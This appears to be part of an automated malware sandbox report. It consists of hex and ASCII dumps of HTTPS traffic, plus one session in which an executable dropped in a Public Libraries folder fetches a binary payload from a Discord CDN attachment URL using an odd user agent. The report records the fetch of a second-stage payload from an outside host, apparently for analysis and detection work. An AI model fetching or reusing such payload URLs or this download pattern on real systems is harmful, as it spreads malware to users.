db 54 af ea 96 2e 5b 20 7b 6d 38 4c 1d 8b e6 ef e1 63 43 e6 a0 46 79 68 a5 d2 cf 37 b3 f4 64 b6 5b 20 66 bb 69 42 05 51 61 2f c4 9d de db 22 17 5d 25 fa 1f f9 9c 51 08 b8 80 8f 9d d1 3c 1f 90 34 42 10 ec 93 a7 b2
                                                Data Ascii: }R<vFi${m).4,/>ZHs<Vvc3$A%^^s6G%3T}veYqUsZ09^GdxAw1Di'.Di2>/oPT.[ {m8LcCFyh7d[ fiBQa/"]%Q<4B
                                                2021-10-13 18:35:47 UTC293INData Raw: 8e 7f 77 0d 65 54 8f fc 24 6a c4 f3 8e 52 8b b4 76 96 2e 5b 20 7e f4 76 e1 11 6e ab e1 15 78 89 8f bd 0c 90 20 77 64 d1 3c 33 c0 e7 71 3b d3 08 d9 5f 2a 58 99 da d2 cd 33 b2 72 bd 0c c2 98 58 99 d6 c8 c2 98 5b 20 71 55 32 3e 3f dd 3e 5a f0 07 37 ca f9 9c 2c 2f d9 4f 71 55 77 64 cc b0 4d ff d2 bf 73 5a be 8e 75 5f 45 eb 12 f1 fa 1f f9 9c 4b fa 76 e1 27 a3 dd 59 6f 50 f3 8e 6b 47 9e 41 8b 94 09 5b 43 e6 86 08 ab e1 06 d4 ae 68 b5 f9 f2 0c c2 98 57 17 14 f5 ff ab 80 f9 ea f8 74 dc 9e 41 f7 98 5f 2a 46 6e bb 07 30 39 ee 02 a1 c9 5a 9e 28 26 65 38 45 eb 1e 0d 09 5b 49 f5 f5 93 87 8a 77 64 d9 4f 23 99 d1 3c 38 4c 19 81 5c a3 a9 dc b9 02 a5 d2 c6 a2 2e 34 20 12 d1 3c 32 3e 3b d3 24 1c 5b 20 05 51 6c c9 4c 7c 99 b5 97 b1 8a 11 0a dd 79 68 b3 f4 63 33 a5 d2 dc d7
                                                Data Ascii: weT$jRv.[ ~vnx wd<3q;_*X3rX[ qU2>?>Z7,/OqUwdMsZu_EKv'YoPkGA[ChWtA_*Fn09Z(&e8E[IwdO#<8L\.4 <2>;$[ QlL|yhc3
                                                2021-10-13 18:35:47 UTC297INData Raw: 93 a6 d5 46 6e ce b5 f9 9d bf 11 6e ce b5 f9 cf 0b 40 06 d4 c3 1a 04 cf 37 cb 5e a7 d7 4b fa 1f 91 a2 4b fa 1f 90 20 41 de fb f8 1a 04 cf 37 ca ab e0 80 f9 9c 3d d8 cd 32 3e 5a 9e 41 e2 e5 3f e1 43 bf 11 6e ce b5 79 68 c1 5e 27 a3 cc 4e 01 48 72 e8 74 dc d6 38 4c 7c f0 05 51 08 d9 4f 50 ba a5 8b 94 29 a8 5a 1e 0d 64 ae 68 c0 83 80 79 68 c1 16 fa 1f 9f 3b 53 0d 65 d0 ba 85 8a ef 04 cf 37 1a 04 cf 38 b1 6f 50 86 b0 6d 4c 73 a6 d5 46 6e 6e ce b5 f6 ee 82 fe 28 ae 68 c0 9c c7 24 1b 86 08 d9 4f 03 4c 2f 8a 31 e2 e5 6c c9 29 28 26 21 fd a6 55 12 fb 21 95 ac 43 e6 ef 84 05 51 0a dd 59 1b 86 08 d9 1c 35 e5 35 c5 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f
                                                Data Ascii: Fnn@7^KK A7=2>ZA?Cnyh^'NHrt8L|QOP)Zdhyh;Se78oPmLsFnn(h$OL/1l)(&!U!CQY55 n=3K n=3K
                                                2021-10-13 18:35:47 UTC300INData Raw: a1 b4 4b 83 bd 79 55 63 0e 8a 2c 46 53 68 fd c7 19 dc ea a1 f4 45 d6 99 88 40 62 f8 27 e6 d2 fe 15 45 d6 f1 b2 49 ce 96 15 69 79 65 03 45 d0 bf 2a 2b 97 4c 46 97 8b 61 15 89 b5 14 cf de e1 86 32 df 64 6b 7d ab db 81 46 bf 2b 60 96 e7 4b 3f e7 b0 57 aa 64 17 47 9b 80 b7 c4 96 17 9d 86 ad df d0 83 f5 aa 1f a9 f8 22 fe 10 3c 6e 77 5c ec cb 55 24 6b 71 26 17 12 c7 4f 35 a2 7d 11 58 c6 94 72 ee 55 24 4f 35 8a 27 e8 c2 df 68 83 b6 44 5f 11 58 ae 5e 94 1f bf 27 88 3b f4 24 00 f1 8d aa ac 50 68 f3 64 85 63 00 27 90 fe 1b 5c 90 f6 26 f3 bd c2 ab 2b 9e 87 b9 c0 a0 f8 29 12 c2 2e 07 e4 d9 e1 50 2c 1c af d9 ed b3 6a f7 1a 37 86 3b cf 05 98 01 fa 2d 2b 9f a5 e0 a4 61 d3 70 30 08 15 49 61 1e 39 ff b5 c8 a4 60 78 d6 54 8f 9d be 8e 1b 86 f8 1a 04 cf 08 24 23 76 dd 99 8f
                                                Data Ascii: KyUc,FShE@b'EIiyeE*+LFa2dk}F+`K?WdG"<nw\U$kq&O5}XrU$O5'hD_X^';$Phdc'\&+).P,j7;-+ap0Ia9`xT$#v
                                                2021-10-13 18:35:47 UTC304INData Raw: e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 5d 4c 12 b8 f4 7e 95 c5 6d 2d e4 ea f8 1a 04 bd 6d 29 c4 de af 84 62 d8 bf 70 85 85 85 85 fc 54 e0 a3 b9 6c a8 33 b2 13 25 9e 41 e2 80 89 f6 41 87 ed ee 63 5b 63 47 9e 20 7b 1f f1 df 5e a7 d7 2e 40 3e 3f af a9 a5 b3 86 7a aa 3b b5 98 60 ac 63 33 c0 f7 f6 60 c3 58 d5 32 5b 67 44 08 ab 93 e6 8a 77 05 02 ca ab e1 63 57 79 1d e4 a8 0f 1d ee 45 92 44 1b
                                                Data Ascii: l)ZAl)ZAl)ZAl)ZAl)ZAl)ZAl)ZAl)ZAl)ZAl)ZAl)ZAl)ZAl)ZAl)ZAl)ZAl]L~m-m)bpTl3%AAc[cG {^.@>?z;`c3`X2[gDwcWyED
                                                2021-10-13 18:35:47 UTC308INData Raw: 65 78 8e 1b 86 49 75 4f 03 0d e5 68 c0 d3 2b b5 f9 dd d9 43 e6 af 80 a1 c9 68 42 70 d3 01 22 2f b6 3a 56 34 42 24 75 1f 90 60 c5 97 b1 af 82 2e 34 02 a2 03 4c 3c 3f 35 c5 5f 42 6c c9 69 2a e2 e5 2c 47 e0 e0 a1 49 e9 76 a1 a3 7d 72 98 59 93 a7 97 db fc 24 5c cb 6e ce f4 97 49 f5 d3 28 1e 0d 25 f7 c0 93 e7 18 37 ca eb 11 ce b5 b8 00 cd 33 80 93 6f 50 c7 54 9b ba c5 76 81 7c b1 6f 78 e6 af 83 60 ac 23 f3 36 47 b0 07 06 d4 83 ea e8 f4 50 ee 2a 2a 6a ad ce b5 b8 87 3a 51 48 1b 66 bb 47 99 75 9f 4f 09 56 e0 89 f7 fd 86 2e 14 bc a5 f2 7c 85 eb 1a 61 43 a5 a6 3b b6 17 14 a6 09 2b d8 a3 ac 06 b8 c3 71 26 48 37 96 5d 52 e4 8e 75 36 10 b0 19 e7 1e 7e 9b c8 c4 f4 5d 79 48 3d 8c 39 ee 6c bc d8 e2 c5 6c a2 38 2d c6 ca c8 d4 c9 24 3e 7a a6 10 be ae 4e a7 f7 fe 07 76 93
                                                Data Ascii: exIuOh+ChBp"/:V4B$u`.4L<?5_Bli*,GIv}rY$\nI(%73oPTv|ox`#6GP**j:QHfGuOV.|aC;+q&H7]Ru6~]yH=9ll8-$>zNv
                                                2021-10-13 18:35:47 UTC312INData Raw: 0a 22 e8 bc 1f 1b 79 96 ce be 66 bb 46 07 ce 0f 96 d1 c3 52 0e 6a fc 75 a0 4e 0a dd 18 75 e3 c6 a2 0a 57 8b 81 f7 b8 09 3f ed 7f 13 73 1b e1 66 d3 14 35 f6 15 39 44 d5 e5 93 59 c9 a3 25 9e 00 cb f2 ad e7 c3 e5 93 52 15 90 20 53 67 35 7d 72 99 3f 81 69 c9 d6 37 3f 73 b2 72 99 3f 65 99 b5 b8 0a 71 40 d4 3c a8 85 e7 99 b5 f9 9c c7 9d bf 50 0c 5a 26 21 d4 ba 4d 45 14 0a 28 f4 f8 1a 45 61 97 10 ec bc 00 9d aa d5 b9 fc fb 27 4b fa 1f 90 bb be 8e 5a 14 4d 47 f0 46 17 51 b2 8d 67 dd fb 49 f5 d2 d6 2c 95 ac 22 9d e3 df a1 37 2a 9b 52 8b d5 2f 7a 51 08 98 b9 ae d0 45 15 98 f3 66 bb 46 07 e6 55 12 b0 e7 29 10 ec fd a4 36 c2 97 71 d1 c3 e5 74 c3 f2 f3 71 aa 12 74 57 e8 0a 3d 3a b9 02 8b fd 3e e0 1f 6f af a6 d0 37 ca ab e3 ee 87 85 7a 15 9b b6 93 a7 96 47 fc 9e 41 a3
                                                Data Ascii: "yfFRjuNuW?sf59DY%R Sg5}r?i7?sr?eq@<PZ&!ME(Ea'KZMGFQgI,"7*R/zQEfFU)6qtqtW=:>o7zGA
                                                2021-10-13 18:35:47 UTC316INData Raw: be 70 20 50 6e 36 02 41 1d 75 ac 29 40 a3 88 86 f4 55 9b 42 31 32 ca e6 66 4b a7 5e 4b a7 5e 7c c3 4d a9 8f 71 91 21 79 e3 32 3e 5a 9e 04 cf 7b 6d 05 51 4e 81 33 c0 c1 16 aa 5e f5 93 e2 e5 3f dd 0c e2 e5 6c df 5e a7 d7 4b fa 5f 2a 0b 60 8f 9d 9b ba b2 72 ed 80 da d2 9b ba c5 1f b3 f4 4f 03 13 73 73 5a b6 7b 47 f0 21 95 f2 0c c7 24 38 4c 5f 2a 6a c4 c9 29 f7 98 6c c9 6e ce 96 2e 74 dc f6 15 2c 2f ef 84 36 47 b0 6d 69 42 4d ff 83 80 d3 41 e2 e5 24 1c 09 5b 45 93 c2 b6 18 97 c5 7a 98 6f 62 82 93 c2 ec 8e 62 e2 b9 71 22 78 82 90 49 a2 17 47 b3 f4 10 ec e0 1f 6f af 15 78 83 f8 7f 59 6f 39 a0 2f d5 23 ea a4 62 82 93 c2 ec 8e 62 e2 b9 71 22 78 82 90 49 a2 17 47 b3 f4 10 ec e2 1a fb 5e 58 99 d0 c2 fd 88 6e a0 3f ae 0a b2 1f cc 82 cd 5e c2 ec 8e 62 e2 b9 71 22 78
                                                Data Ascii: p Pn6Au)@UB12fK^K^|Mq!y2>Z{mQN3^?l^K_*`rOssZ{G!$8L_*j)ln.t,/6GmiBMA$[Ezobbq"xIGoxYo9/#bbq"xIG^Xn?^bq"x
                                                2021-10-13 18:35:47 UTC321INData Raw: ee fd 59 e4 15 78 aa 3e 30 5d 77 10 9d db 17 15 09 3f bf 62 df 2f ce fa 7f 04 a8 1e 7a 83 f2 7f 05 51 08 d9 54 70 2c d0 45 eb 7b 6d 4c 14 99 d5 20 76 86 63 5c 8e 78 8d f2 0c e2 e5 60 53 f2 f3 71 55 12 a3 a9 af af 82 95 c8 e8 9a 50 eb 08 bd 7d 72 d8 cd 3d 27 5c 5c 5c a3 8f f6 7b 1f f4 57 77 09 38 27 c7 24 1c 09 50 79 97 4e 7e f4 10 ec ab 90 48 00 a1 8c 7e 9f a0 46 6e ce bc 75 a0 b9 fd a6 55 12 f1 d8 a9 bc e9 33 a8 31 df 5e a7 d7 43 19 7e 0b 9f c4 df 2f d2 df 2d d6 8d f1 e2 81 3c 56 94 29 a3 32 c1 e9 89 8f de bf 7a 8f ee 66 fe 40 34 26 61 2f b6 7b 66 44 96 d1 c3 1a 42 00 b6 39 a0 2a 46 0e 8a 72 93 cf 5a fa 5f 2a 2a 2a 25 61 d0 45 14 f5 93 a7 d7 19 e5 1f d4 b2 03 22 66 f7 f6 76 85 85 85 85 89 70 2c d0 45 eb 7b 6d 4c 3a 35 b6 2d da bf 72 b6 0d 17 3e 32 4f 67
                                                Data Ascii: Yx>0]w?b/zQTp,E{mL vc\x`SqUP}r='\\\{Ww8'$PyN~H~FnuU31^C~/-<V)2zf@4&a/{fDB9*FrZ_***%aE"fvp,E{mL:5-r>2Og
                                                2021-10-13 18:35:47 UTC325INData Raw: ae 97 4e 91 2f 5e 75 6c 0f e2 c1 1a 8e d2 8c e9 89 70 80 11 ad 6d 4c 7c f0 06 6d 98 b8 58 12 03 c7 75 09 08 1a fb 5e 58 b8 68 12 c2 5b df a1 36 6e 26 20 a0 86 83 43 bd 52 9b f9 15 b8 b3 0b 9f cd 5d cd cc 4f 79 5b c8 a7 96 24 a8 fb a0 f4 10 ad 9a 58 94 a2 5c d6 3e df 4a 04 46 9e ca a7 81 83 b0 e6 eb 38 c7 28 6d c7 2c 7c 7b b5 72 8e 48 73 1a 89 4c 22 48 28 e0 95 77 6d 12 55 e1 60 4d 7c 21 1c ac 90 dc d5 af 2b 67 b4 b0 e4 fa 51 09 4b bc 89 87 cc 3b 18 d6 9e 98 ba 87 f8 c3 23 8d d7 c0 93 a7 d7 79 80 09 d2 b5 8e 0b 2e 1f 84 4d 74 ea 13 b5 70 18 76 36 ce e6 b8 d6 58 5a c5 0f 22 e8 f4 10 ee 78 0e 24 97 69 c9 7a 28 7d 62 fa e0 20 86 07 96 aa 5e a7 d5 c8 4f c0 18 27 28 75 cf f4 4b a4 af 15 87 5e 4f 03 4c 7f c6 4a b1 64 a6 1b 79 67 49 2d 88 0d 65 3a fe c0 55 99 45
                                                Data Ascii: N/^ulpmL|mXu^Xh[6n& CR]Oy[$X\>JF8(m,|{rHsL"H(wmU`M|!+gQK;#y.Mtpv6XZ"x$iz(}b ^O'(uK^OLJdygI-e:UE
                                                2021-10-13 18:35:47 UTC329INData Raw: 70 27 e6 62 b1 ae 4c a7 bf 01 c1 72 81 25 c4 5d 16 fa 1f 80 93 4f fb e4 61 df b5 06 2b b4 ee eb b8 7f 88 f5 9d 57 eb 3e d1 3c 17 59 ad 8e 0b e9 12 a8 03 16 3a 62 6f 24 dc 53 0d 65 37 15 90 d8 88 86 30 68 3f d5 cd cf 72 53 f9 c9 a2 4b fa 0f 83 68 38 09 d0 4e d4 4e 97 5a da 80 06 c4 16 06 91 29 88 84 67 0d 9a 5c a3 8c 32 91 ca fe e8 c7 db ab 16 5b c8 5b 65 b3 f4 10 fc ed 68 38 09 d0 9a b1 8b a4 af 8e 1b c7 00 11 06 81 bc b9 fe 6d c5 e7 24 95 58 d4 4a be bd f8 de 58 75 d4 96 2e 74 51 cb ed db 0a 82 a3 97 d5 15 87 92 ae ae e3 b0 e6 eb 5f 66 30 6c 81 2d 4d f7 13 b5 72 0f e2 0d ee 1a 55 ed 88 86 ce 3e 8d 12 01 c3 e0 6b 63 3f 54 de 8e 4c 2a 79 f8 d9 12 a8 03 17 23 c6 52 60 53 f2 16 a4 b9 c1 e9 89 ae 60 44 91 e7 fc 24 5d 06 24 74 cc 39 aa 07 0f 33 00 f6 e5 87 75
                                                Data Ascii: p'bLr%]Oa+W><Y:bo$Se70h?rSKh8NNZ)g\2[[eh8m$XJXu.tQ_f0l-MrU>kc?TL*y#R`S`D$]$t93u
                                                2021-10-13 18:35:47 UTC332INData Raw: 6e 14 7e 0b 9f e7 c0 7b 3b 80 39 45 28 d9 b0 23 c2 70 83 88 cd b0 6d 0c 6f 93 fc 20 51 83 7f 88 40 db bc da da 91 2f 6e 45 b8 10 2f eb 22 4e 7e 0b 43 23 71 a9 99 3e 52 f5 93 5c de 5b c4 76 1e f2 2a 33 29 6b b8 7f 3a ca 43 b6 73 9a bb fb e4 61 2f b6 7b 56 7c 0c a7 5c a3 8c 0e d2 d7 5b a9 b8 d9 16 a0 86 3b 2c d0 9b f2 e4 16 bf 9a c4 7f f7 63 66 31 44 96 0f 0f 81 78 a6 de 27 e6 64 96 a7 b3 c4 62 d5 46 2f ae 46 06 81 bc b9 02 ca ab 82 16 06 91 29 54 ca 22 ec a8 d2 40 a0 62 f8 f2 f4 d4 40 b3 7f 22 17 3d 55 d1 67 63 f5 18 f3 4a f4 10 ec fd a6 50 09 3f 22 e8 d0 ec 15 77 10 37 4e 47 7b 6d 6c 8f 5b 24 5a 17 82 01 69 ce 5d 25 df 52 97 10 ed 32 c1 e9 39 d2 57 47 f8 5c 2e cb d1 1d 2a c2 5e 2c fd 95 5c 28 fc af 15 87 ae 5a 76 11 aa dd 51 7c 22 93 f1 da d2 ff 26 e2 26
                                                Data Ascii: n~{;9E(#pmo Q@/nE/"N~C#q>R\[v*3)k:Csa/{V|\[;,cf1Dx'dbF/F)T"@b@"=UgcJP?"w7NG{ml[$Zi]%R29WG\.*^,\(ZvQ|"&&
                                                2021-10-13 18:35:47 UTC348INData Raw: 16 ca 54 eb 7b 2d 6a 7e 9c 68 00 f6 46 6e a4 bc 01 1d 8b d4 4e 81 6c 0b 3d 81 27 60 27 53 e6 10 13 16 03 a5 11 91 5d 49 56 7c 0c a7 5a 9e 01 90 75 37 da 5b 44 30 60 f6 d5 75 5f 6b 34 7e 71 49 7e 8b 74 5f d5 b9 a0 ec 15 6c 9c b6 87 cf bc 75 a0 29 fd 4e 89 da 59 e7 34 cf 17 96 ae 68 80 f8 a1 ce c1 16 fa 1b 86 04 b2 f3 ae e1 07 66 44 0d 65 78 3e 14 9d ea 38 7f 24 1c 63 df d5 13 73 4a b5 a4 d0 ba c5 1e b5 15 f3 db 54 83 42 39 4e 81 3c 57 af 06 5f 7f 77 6c 0b 3d 58 99 f5 92 9d 53 86 5d e5 e7 71 41 20 4f fc db ab 2f 5e f7 90 65 b3 a4 5c e6 64 e6 fb e4 61 49 a5 ca ee 89 e9 61 c4 1d 8b d4 c2 20 15 0c e2 e5 68 c0 83 fd 27 4f 88 58 59 90 20 53 9e 01 6d b3 34 c9 29 e9 e5 28 03 b3 34 c9 29 e9 e5 24 39 31 7b e6 ef c5 8c 5a bb f8 d9 4e 81 3d 5f 82 d3 c2 58 12 32 63 cb
                                                Data Ascii: T{-j~hFnNl='`'S]IV|Zu7[D0`u_k4~qI~t_lu)NY4hfDex>8$csJTB9N<W_wl=XS]qA O/^e\daIa h'OXY Sm4)(4)$91{ZN=_X2c
                                                2021-10-13 18:35:47 UTC364INData Raw: bb f8 e5 90 df b6 7b 2c a9 54 2e 64 be cb a5 d2 bf 15 fc cd 6a 3b 2c d6 43 0e e7 30 be 92 a0 42 ef 44 de d4 3c a9 25 84 eb 73 2a d5 4a 07 a9 d4 86 83 d0 b2 37 41 e2 e5 68 6b ae 31 44 96 d7 f9 74 dc 96 a9 dc 52 8f 16 3a e6 e0 1f 6f a9 9d 57 1f e0 1f 9c 4d 00 cd 76 6a 94 21 d0 31 bb 07 52 59 f2 55 ed 7f 8e e2 0d 91 f7 13 9d fa a8 55 42 6c 8c 9d e6 10 13 89 09 b3 a1 b6 90 4d 8b dc 9e 35 8d bc fe 22 65 3a b9 81 34 b6 3e d1 65 c7 db ae 18 17 28 26 21 90 29 41 bb f8 e5 96 3e b2 72 99 33 10 69 46 e5 9c 78 51 07 06 dc 92 ae 68 c0 96 0d 8c 4f fc db ae 42 8c 16 bb 81 dc 52 8f 16 0a 98 84 0c b2 7a ae e3 67 3d dd 64 5f 73 a5 2d 48 17 95 58 cc 3b 23 dc 60 a3 9d b7 bb 8c 26 ca b3 80 fd d4 c1 fe ab a9 28 63 b8 d9 b0 92 df a0 ae 3d 81 83 7f 8d 4c 94 7c f0 07 53 63 da 8b
                                                Data Ascii: {,T.dj;,C0BD<%s*J7Ahk1DtR:oWMvj!1RYUUBlM5"e:4>e(&!)A>r3iFxQhOBRzg=d_s-HX;#`&(c=L|Sc
                                                2021-10-13 18:35:47 UTC380INData Raw: 9f 9a 67 c9 6c 42 9b 45 52 5f c2 c8 5b 65 b3 a4 af 15 85 20 97 3c 06 2c 6a 4f fc db ab a8 df 51 08 e1 e3 97 f4 9b 4a 32 b7 12 b4 fd 7e f7 d8 32 c1 ac 66 53 5d da 2d 4c aa db d9 b0 92 9f cd db 04 8f 5e a4 af 15 85 20 97 3c 06 2b 52 75 89 0a 50 d6 80 3a 7a eb 7b 6c cc 08 85 7a 14 08 7c ed 04 09 07 29 a8 5a 9f c1 2b ed 42 67 3c 05 dc 28 d9 f5 d6 20 42 9b 45 15 ae ed 0d 9a c7 9d 5e 4f 55 69 36 b8 7e 77 94 a2 b4 89 36 b1 07 06 2b 52 76 44 ec 70 83 7f 88 f3 24 99 38 b3 0b da bb ef d4 00 c6 5d da 2f 13 f6 98 63 c3 5f a1 9e 06 d4 c3 1a ad 69 4d ff ab e0 e5 51 48 b0 6e 09 d0 4a 0a f6 f9 e1 e8 18 ba 0c 1d 74 22 f9 74 9c cd 76 6a c4 9d bf ba 6c 36 b8 3a f5 7b 3d 27 5c 5e 02 4f 8e 4b 06 91 29 f8 1b c5 92 d9 12 da 22 4a fc d4 86 81 7e 34 c1 ea bd 87 83 6b 47 f0 07 a3
                                                Data Ascii: glBER_[e <,jOQJ2~2fS]-L^ <+RuP:z{lz|)Z+Bg<( BE^OUi6~w6+RvDp$8]/c_iMQHnJt"tvjl6:{='\^OK)"J~4kG
                                                2021-10-13 18:35:47 UTC396INData Raw: 95 e8 7f 71 23 8d bd 48 48 70 58 9f 4d ef a0 02 41 e4 99 a5 f6 51 33 c6 29 ab 68 c6 a1 c5 5f a1 ce 3e 5c 2a 22 57 9c 3a da 8a fa 18 76 e1 22 92 c1 b7 fa 5e 2e 24 38 08 f2 18 db 10 67 3c df 4e a5 96 a5 c6 86 5c 2a d5 b9 f2 0c 00 44 4d eb 78 f6 31 d7 c2 67 c2 68 c0 76 60 ac 63 3c a9 19 00 2f 3d 08 52 87 ae 34 cf 33 e4 96 a3 c5 3b a7 5a ba 91 2b 45 2f 35 90 77 32 6d dc 14 ae 36 18 a2 53 c9 aa c2 ed 87 b1 ef c5 9a dc 6f 57 9e 41 69 45 60 a3 26 22 9e 81 4f 05 24 dc 52 74 23 62 97 59 4b fc af ba 83 ab e1 26 aa 5e a7 c7 24 74 d8 a7 c8 d4 c3 5f 11 68 4b fa 5a 17 69 66 ff 20 15 0e f3 aa 1a 3f dd 1c 82 f8 93 b7 da 96 a5 d4 b0 7d 56 d0 81 7a 60 ac 26 a8 5c a0 4a 37 41 e5 e7 77 ed 88 4d 74 db df 05 ba 82 77 64 f7 1d 6f f1 8d da 5b 30 1d cf 1c 1d af ae e3 64 3f cd 17
                                                Data Ascii: q#HHpXMAQ3)h_>\*"W:v"^.$8g<N\*DMx1ghv`c</=R43;Z+E/5w2m6SoWAiE`&"O$Rt#bYK&^$t_hKZif ?}Vz`&\J7AwMtwdo[0d?


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.549757162.159.133.233443C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe
                                                TimestampkBytes transferredDirectionData
                                                2021-10-13 18:36:04 UTC399OUTGET /attachments/895935504124612633/897863238044242010/Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq HTTP/1.1
                                                User-Agent: aswe
                                                Host: cdn.discordapp.com
                                                Cache-Control: no-cache
                                                2021-10-13 18:36:04 UTC399INHTTP/1.1 200 OK
                                                Date: Wed, 13 Oct 2021 18:36:04 GMT
                                                Content-Type: application/octet-stream
                                                Content-Length: 283648
                                                Connection: close
                                                CF-Ray: 69daabe2ed88432d-FRA
                                                Accept-Ranges: bytes
                                                Age: 11434
                                                Cache-Control: public, max-age=31536000
                                                Content-Disposition: attachment;%20filename=Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq
                                                ETag: "0584cd5c8571b60faaa2811123ac81ce"
                                                Expires: Thu, 13 Oct 2022 18:36:04 GMT
                                                Last-Modified: Wed, 13 Oct 2021 15:07:57 GMT
                                                Vary: Accept-Encoding
                                                CF-Cache-Status: HIT
                                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                x-goog-generation: 1634137677483270
                                                x-goog-hash: crc32c=+JhllA==
                                                x-goog-hash: md5=BYTNXIVxtg+qooERI6yBzg==
                                                x-goog-metageneration: 1
                                                x-goog-storage-class: STANDARD
                                                x-goog-stored-content-encoding: identity
                                                x-goog-stored-content-length: 283648
                                                X-GUploader-UploadID: ADPycduGriJbFyWO3Ajj_7J6Zp42-vZFeJqDaEKSLbDXSCG_QR3-28T4UU8losd0PhRIFGKcDfjlfEiv-ZVdDLP8AEI
                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                2021-10-13 18:36:04 UTC400INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 38 4b 74 77 48 46 6c 4f 43 64 5a 5a 48 6b 73 58 6b 31 30 6e 42 44 77 64 72 67 25 32 42 53 41 25 32 46 49 31 55 61 73 4d 54 4c 70 37 63 5a 44 6c 79 42 50 33 56 35 74 44 55 32 66 6c 6e 62 38 74 48 75 65 71 65 7a 6f 66 43 50 4b 4c 47 6f 51 79 7a 33 58 4b 58 4e 4b 46 45 75 39 4a 73 4e 47 57 41 62 75 53 75 75 79 6d 51 56 53 59 36 6b 59 4b 6c 48 39 59 4c 6d 75 65 47 35 25 32 42 35 73 25 32 46 74 47 25 32 42 66 6e 45 6d 4a 25 32 46 6a 6e 77 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78
                                                Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8KtwHFlOCdZZHksXk10nBDwdrg%2BSA%2FI1UasMTLp7cZDlyBP3V5tDU2flnb8tHueqezofCPKLGoQyz3XKXNKFEu9JsNGWAbuSuuymQVSY6kYKlH9YLmueG5%2B5s%2FtG%2BfnEmJ%2Fjnw%3D%3D"}],"group":"cf-nel","max
                                                2021-10-13 18:36:04 UTC401INData Raw: 19 c6 ec b4 32 7a aa 0e a0 08 90 64 f2 4d af b2 2a 6d 02 83 c4 d9 0e b7 b9 4c 35 81 38 0d 35 9d e7 36 09 12 b5 bd 4d af ad a8 13 37 8e 5a ce ed d8 8a 5f 63 77 20 53 5d 62 ff e2 a1 8d d8 9d e7 29 ef ca e2 a1 8d d8 9d f8 54 c6 e6 ab a0 16 a2 13 34 0c ab a5 96 6f 00 82 b0 24 58 dd 18 af b2 2a 6d 02 83 c4 d9 0e b7 b9 4c 35 81 38 0d 35 9d e7 36 09 12 b5 bd 4d af ad a8 13 37 8e 5a ce ed d8 8a 5f 63 77 20 53 5d 62 ff e2 a1 8d d8 9d e7 29 ef ca e2 a1 8d d8 9d f8 54 c6 e6 ab a0 16 a2 13 34 0c ab a5 96 6f 00 82 b0 24 58 dd 18 af b2 2a 6d 02 83 c4 d9 0e b7 b9 4c 35 81 38 0d 35 9d e7 36 09 12 b5 bd 4d af ad a8 13 37 8e 5a ce ed d8 8a 5f 63 77 20 53 5d 62 ff e2 a1 8d d8 9d e7 29 ef ca e2 a1 8d d8 9d f8 54 c6 e6 ab a0 16 a2 13 34 0c ab a5 96 6f 00 82 b0 24 58 dd 18 af
                                                Data Ascii: 2zdM*mL5856M7Z_cw S]b)T4o$X*mL5856M7Z_cw S]b)T4o$X*mL5856M7Z_cw S]b)T4o$X
                                                2021-10-13 18:36:04 UTC402INData Raw: 1e cc 70 0b be 4c b1 39 14 21 5b f6 dc 16 39 09 81 a8 9d 7f b5 21 5d f0 de 00 1a c2 40 9e 94 f2 c7 ea 32 fa de 07 88 db 8c d5 8d 50 47 30 e1 bd ce 78 30 e3 b3 3a 87 43 27 60 6b 9d 6b 80 39 0c 3a 99 60 75 84 dc 11 b6 ba 50 5d ee cc 7a 2f 77 b8 5e 71 8d 5a 55 db 95 6c 11 b0 af 27 75 85 51 c6 74 15 b9 c1 d1 e6 3b 14 35 07 8e d3 94 f0 dc 08 1f 48 b2 a7 0c 29 66 71 91 63 ef 5a 48 ab 22 dc 1e cc 70 0b be 4c b1 39 14 21 5b f6 dc 16 39 09 81 a8 9d 7f b5 21 5d f0 de 00 1a c2 40 9e 94 f2 c7 ea 32 fa de 07 88 db 8c d5 8d 50 47 30 e1 bd ce 78 30 e3 b3 3a 87 43 27 60 6b 9d 6b 80 39 0c 3a 99 60 75 84 dc 11 b6 ba 50 5d ee cc 7a 2f 77 b8 5e 71 8d 5a 55 db 95 6c 11 b0 af 27 75 85 51 c6 74 15 b9 c1 d1 e6 3b 14 35 07 8e d3 94 f0 dc 08 1f 48 b2 a7 0c 29 66 71 91 63 ef 5a 48
                                                Data Ascii: pL9![9!]@2PG0x0:C'`kk9:`uP]z/w^qZUl'uQt;5H)fqcZH"pL9![9!]@2PG0x0:C'`kk9:`uP]z/w^qZUl'uQt;5H)fqcZH
